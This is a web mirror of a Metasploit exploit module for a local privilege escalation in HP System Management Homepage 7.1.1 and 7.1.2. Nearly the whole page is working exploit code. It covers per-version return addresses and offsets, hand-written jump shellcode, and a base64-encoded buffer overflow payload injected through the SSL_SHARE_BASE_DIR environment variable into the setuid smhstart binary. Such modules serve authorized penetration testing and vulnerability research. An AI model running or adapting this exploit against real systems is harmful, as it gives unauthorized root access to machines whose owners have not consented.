Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/hp_smhstart.rb
19720 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = NormalRanking
8
9
include Msf::Exploit::EXE
10
include Msf::Post::File
11
12
include Msf::Exploit::Local::Linux
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
{
19
'Name' => 'HP System Management Homepage Local Privilege Escalation',
20
'Description' => %q{
21
Versions of HP System Management Homepage <= 7.1.2 include a setuid root
22
smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
23
env variable.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'agix' # @agixid # Vulnerability discovery and Metasploit module
28
],
29
'Platform' => [ 'linux' ],
30
'Arch' => [ ARCH_X86 ],
31
'SessionTypes' => [ 'shell' ],
32
'Payload' => {
33
'Space' => 227,
34
'BadChars' => "\x00\x22"
35
},
36
'References' => [
37
['OSVDB', '91990']
38
],
39
'Targets' => [
40
[
41
'HP System Management Homepage 7.1.1',
42
{
43
'Arch' => ARCH_X86,
44
'CallEsp' => 0x080c86eb, # call esp
45
'Offset' => 58
46
}
47
],
48
[
49
'HP System Management Homepage 7.1.2',
50
{
51
'Arch' => ARCH_X86,
52
'CallEsp' => 0x080c8b9b, # call esp
53
'Offset' => 58
54
}
55
],
56
],
57
'DefaultOptions' => {
58
'PrependSetuid' => true
59
},
60
'DefaultTarget' => 0,
61
'DisclosureDate' => '2013-03-30',
62
'Notes' => {
63
'Reliability' => UNKNOWN_RELIABILITY,
64
'Stability' => UNKNOWN_STABILITY,
65
'SideEffects' => UNKNOWN_SIDE_EFFECTS
66
},
67
}
68
)
69
)
70
register_options([
71
OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
72
])
73
end
74
75
def exploit
76
pl = payload.encoded
77
padding = rand_text_alpha(target['Offset'])
78
ret = [target['CallEsp']].pack('V')
79
exploit = pl
80
exploit << ret
81
exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11
82
exploit << "\xe9\x0e\xff\xff\xff" # jmp => beginning of pl
83
exploit << padding
84
exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
85
id = cmd_exec("id -un")
86
if id != "hpsmh"
87
fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
88
end
89
cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
90
cmd_exec("#{datastore['smhstartDir']}/smhstart")
91
end
92
end
93
94